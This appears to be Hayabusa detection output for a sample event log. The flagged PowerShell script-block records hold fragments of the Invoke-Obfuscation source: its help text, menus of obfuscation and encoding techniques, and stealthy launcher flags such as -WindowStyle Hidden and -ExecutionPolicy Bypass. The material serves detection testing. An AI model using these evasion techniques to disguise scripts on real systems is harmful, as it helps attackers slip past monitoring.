-ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -Quiet C:\PS> Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP' -NoExit -Quiet .NOTES Invoke-Obfuscation orchestrates the application of all obfuscation functions to provided PowerShell script block or script path contents to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [String] $ScriptPath, [String] $Command, [Switch] $NoExit, [Switch] $Quiet ) # Define variables for CLI functionality. $Script:CliCommands = @() $Script:CompoundCommand = @() $Script:QuietWasSpecified = $FALSE $CliWasSpecified = $FALSE $NoExitWasSpecified = $FALSE # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['ScriptBlock']) { $Script:CliCommands += ('set scriptblock ' + [String]$ScriptBlock) } If($PSBoundParameters['ScriptPath']) { $Script:CliCommands += ('set scriptpath ' + $ScriptPath) } # Append Command to CliCommands if specified by user input. 
If($PSBoundParameters['Command']) { $Script:CliCommands += $Command.Split(',') $CliWasSpecified = $TRUE If($PSBoundParameters['NoExit']) { $NoExitWasSpecified = $TRUE } If($PSBoundParameters['Quiet']) { # Create empty Write-Host and Start-Sleep proxy functions to cause any Write-Host or Start-Sleep invocations to not do anything until non-interactive -Command values are finished being processed. Function Write-Host {} Function Start-Sleep {} $Script:QuietWasSpecified = $TRUE } } ######################################## ## Script-wide variable instantiation ## ######################################## # Script-level array of Show Options menu, set as SCRIPT-level so it can be set from within any of the functions. # Build out menu for Show Options selection from user in Show-OptionsMenu menu. $Script:ScriptPath = '' $Script:ScriptBlock = '' $Script:CliSyntax = @() $Script:ExecutionCommands = @() $Script:ObfuscatedCommand = '' $Script:ObfuscatedCommandHistory = @() $Script:ObfuscationLength = '' $Script:OptionsMenu = @() $Script:OptionsMenu += , @('ScriptPath ' , $Script:ScriptPath , $TRUE) $Script:OptionsMenu += , @('ScriptBlock' , $Script:ScriptBlock , $TRUE) $Script:OptionsMenu += , @('CommandLineSyntax' , $Script:CliSyntax , $FALSE) $Script:OptionsMenu += , @('ExecutionCommands' , $Script:ExecutionCommands, $FALSE) $Script:OptionsMenu += , @('ObfuscatedCommand' , $Script:ObfuscatedCommand, $FALSE) $Script:OptionsMenu += , @('ObfuscationLength' , $Script:ObfuscatedCommand, $FALSE) # Build out $SetInputOptions from above items set as $TRUE (as settable). $SettableInputOptions = @() ForEach($Option in $Script:OptionsMenu) { If($Option[2]) {$SettableInputOptions += ([String]$Option[0]).ToLower().Trim()} } # Script-level variable for whether LAUNCHER has been applied to current ObfuscatedToken. $Script:LauncherApplied = $FALSE # Ensure Invoke-Obfuscation module was properly imported before continuing. 
If(!(Get-Module Invoke-Obfuscation | Where-Object {$_.ModuleType -eq 'Manifest'})) { $PathTopsd1 = ""$ScriptDir\Invoke-Obfuscation.psd1"" If($PathTopsd1.Contains(' ')) {$PathTopsd1 = '""' + $PathTopsd1 + '""'} Write-Host ""`n`nERROR: Invoke-Obfuscation module is not loaded. You must run:"" -ForegroundColor Red Write-Host "" Import-Module $PathTopsd1`n`n"" -ForegroundColor Yellow Exit } # Maximum size for cmd.exe and clipboard. $CmdMaxLength = 8190 # Build interactive menus. $LineSpacing = '[*] ' # Main Menu. $MenuLevel = @() $MenuLevel+= , @($LineSpacing, 'TOKEN' , 'Obfuscate PowerShell command ') $MenuLevel+= , @($LineSpacing, 'STRING' , 'Obfuscate entire command as a ') $MenuLevel+= , @($LineSpacing, 'ENCODING' , 'Obfuscate entire command via ') $MenuLevel+= , @($LineSpacing, 'LAUNCHER' , 'Obfuscate command args w/ techniques (run once at end)') # Main\Token Menu. $MenuLevel_Token = @() $MenuLevel_Token += , @($LineSpacing, 'STRING' , 'Obfuscate tokens (suggested to run first)') $MenuLevel_Token += , @($LineSpacing, 'COMMAND' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'ARGUMENT' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'MEMBER' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'VARIABLE' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'TYPE ' , 'Obfuscate tokens') $MenuLevel_Token += , @($LineSpacing, 'COMMENT' , 'Remove all tokens') $MenuLevel_Token += , @($LineSpacing, 'WHITESPACE' , 'Insert random (suggested to run last)') $MenuLevel_Token += , @($LineSpacing, 'ALL ' , 'Select choices from above (random order)') $MenuLevel_Token_String = @() $MenuLevel_Token_String += , @($LineSpacing, '1' , ""Concatenate --> e.g. <('co'+'ffe'+'e')>"" , @('Out-ObfuscatedTokenCommand', 'String', 1)) $MenuLevel_Token_String += , @($LineSpacing, '2' , ""Reorder --> e.g. 
<('{1}{0}'-f'ffee','co')>"" , @('Out-ObfuscatedTokenCommand', 'String', 2)) $MenuLevel_Token_Command = @() $MenuLevel_Token_Command += , @($LineSpacing, '1' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Command', 1)) $MenuLevel_Token_Command += , @($LineSpacing, '2' , ""Splatting + Concatenate --> e.g. <&('Ne'+'w-Ob'+'ject')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 2)) $MenuLevel_Token_Command += , @($LineSpacing, '3' , ""Splatting + Reorder --> e.g. <&('{1}{0}'-f'bject','New-O')>"" , @('Out-ObfuscatedTokenCommand', 'Command', 3)) $MenuLevel_Token_Argument = @() $MenuLevel_Token_Argument += , @($LineSpacing, '1' , 'Random Case --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 1)) $MenuLevel_Token_Argument += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 2)) $MenuLevel_Token_Argument += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('Ne'+'t.We'+'bClient')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 3)) $MenuLevel_Token_Argument += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'bClient','Net.We')>"" , @('Out-ObfuscatedTokenCommand', 'CommandArgument', 4)) $MenuLevel_Token_Member = @() $MenuLevel_Token_Member += , @($LineSpacing, '1' , 'Random Case --> e.g. '",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. 
' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. <.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. 
$MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. 
$MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,", @('Out-ObfuscatedTokenCommand', 'Member', 1)) $MenuLevel_Token_Member += , @($LineSpacing, '2' , 'Ticks --> e.g. ' , @('Out-ObfuscatedTokenCommand', 'Member', 2)) $MenuLevel_Token_Member += , @($LineSpacing, '3' , ""Concatenate --> e.g. <('dOwnLo'+'AdsT'+'Ring').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 3)) $MenuLevel_Token_Member += , @($LineSpacing, '4' , ""Reorder --> e.g. <('{1}{0}'-f'dString','Downloa').Invoke()>"" , @('Out-ObfuscatedTokenCommand', 'Member', 4)) $MenuLevel_Token_Variable = @() $MenuLevel_Token_Variable += , @($LineSpacing, '1' , 'Random Case + {} + Ticks --> e.g. <${c`hEm`eX}>' , @('Out-ObfuscatedTokenCommand', 'Variable', 1)) $MenuLevel_Token_Type = @() $MenuLevel_Token_Type += , @($LineSpacing, '1' , ""Type Cast + Concatenate --> e.g. <[Type]('Con'+'sole')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 1)) $MenuLevel_Token_Type += , @($LineSpacing, '2' , ""Type Cast + Reordered --> e.g. <[Type]('{1}{0}'-f'sole','Con')>"" , @('Out-ObfuscatedTokenCommand', 'Type', 2)) $MenuLevel_Token_Whitespace = @() $MenuLevel_Token_Whitespace += , @($LineSpacing, '1' , ""`tRandom Whitespace --> e.g. 
<.( 'Ne' +'w-Ob' + 'ject')>"" , @('Out-ObfuscatedTokenCommand', 'RandomWhitespace', 1)) $MenuLevel_Token_Comment = @() $MenuLevel_Token_Comment += , @($LineSpacing, '1' , ""Remove Comments --> e.g. self-explanatory"" , @('Out-ObfuscatedTokenCommand', 'Comment', 1)) $MenuLevel_Token_All = @() $MenuLevel_Token_All += , @($LineSpacing, '1' , ""`tExecute Token obfuscation techniques (random order)"" , @('Out-ObfuscatedTokenCommandAll', '', '')) # Main\String Menu. $MenuLevel_String = @() $MenuLevel_String += , @($LineSpacing, '1' , ' entire command' , @('Out-ObfuscatedStringCommand', '', 1)) $MenuLevel_String += , @($LineSpacing, '2' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 2)) $MenuLevel_String += , @($LineSpacing, '3' , ' entire command after concatenating' , @('Out-ObfuscatedStringCommand', '', 3)) # Main\Encoding Menu. $MenuLevel_Encoding = @() $MenuLevel_Encoding += , @($LineSpacing, '1' , ""`tEncode entire command as "" , @('Out-EncodedAsciiCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '2' , ""`tEncode entire command as "" , @('Out-EncodedHexCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '3' , ""`tEncode entire command as "" , @('Out-EncodedOctalCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '4' , ""`tEncode entire command as "" , @('Out-EncodedBinaryCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '5' , ""`tEncrypt entire command as (AES)"" , @('Out-SecureStringCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '6' , ""`tEncode entire command as "" , @('Out-EncodedBXORCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '7' , ""`tEncode entire command as "" , @('Out-EncodedSpecialCharOnlyCommand' , '', '')) $MenuLevel_Encoding += , @($LineSpacing, '8' , ""`tEncode entire command as "" , @('Out-EncodedWhitespaceCommand' , '', '')) # Main\Launcher Menu. 
$MenuLevel_Launcher = @() $MenuLevel_Launcher += , @($LineSpacing, 'PS' , ""`t"") $MenuLevel_Launcher += , @($LineSpacing, 'CMD' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'WMIC' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL' , ' + PowerShell') $MenuLevel_Launcher += , @($LineSpacing, 'VAR+' , 'Cmd + set && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN+' , 'Cmd + | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP+' , 'Cmd + | Clip && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'VAR++' , 'Cmd + set && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'STDIN++' , 'Cmd + set && Cmd | PowerShell - (stdin)') $MenuLevel_Launcher += , @($LineSpacing, 'CLIP++' , 'Cmd + | Clip && Cmd && PowerShell iex ') $MenuLevel_Launcher += , @($LineSpacing, 'RUNDLL++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher += , @($LineSpacing, 'MSHTA++' , 'Cmd + set Var && && PowerShell iex Var') $MenuLevel_Launcher_PS = @() $MenuLevel_Launcher_PS += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_PS += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_PS += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '1')) $MenuLevel_Launcher_CMD = @() $MenuLevel_Launcher_CMD += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_CMD += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '2')) $MenuLevel_Launcher_WMIC = @() $MenuLevel_Launcher_WMIC += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_WMIC += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '3')) $MenuLevel_Launcher_RUNDLL = @() $MenuLevel_Launcher_RUNDLL += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '4' , '-NoProfile'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.300 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,", @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '4')) $MenuLevel_Launcher_RUNDLL += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '4')) ${MenuLevel_Launcher_VAR+} = @() ${MenuLevel_Launcher_VAR+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
23459)`n"", '' , '' , @('', '', '')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '0' , 'NO EXECUTION FLAGS' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '1' , '-NoExit' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '2' , '-NonInteractive' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '3' , '-NoLogo' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '4' , '-NoProfile' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '5' , '-Command' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '6' , '-WindowStyle Hidden' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '7' , '-ExecutionPolicy Bypass' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_VAR+} += , @($LineSpacing, '8' , '-Wow64 (to path 32-bit powershell.exe)' , @('Out-PowerShellLauncher', '', '5')) ${MenuLevel_Launcher_STDIN+} = @() ${MenuLevel_Launcher_STDIN+} += , @(""Enter string of numbers with all desired flags to pass to function. (e.g. 
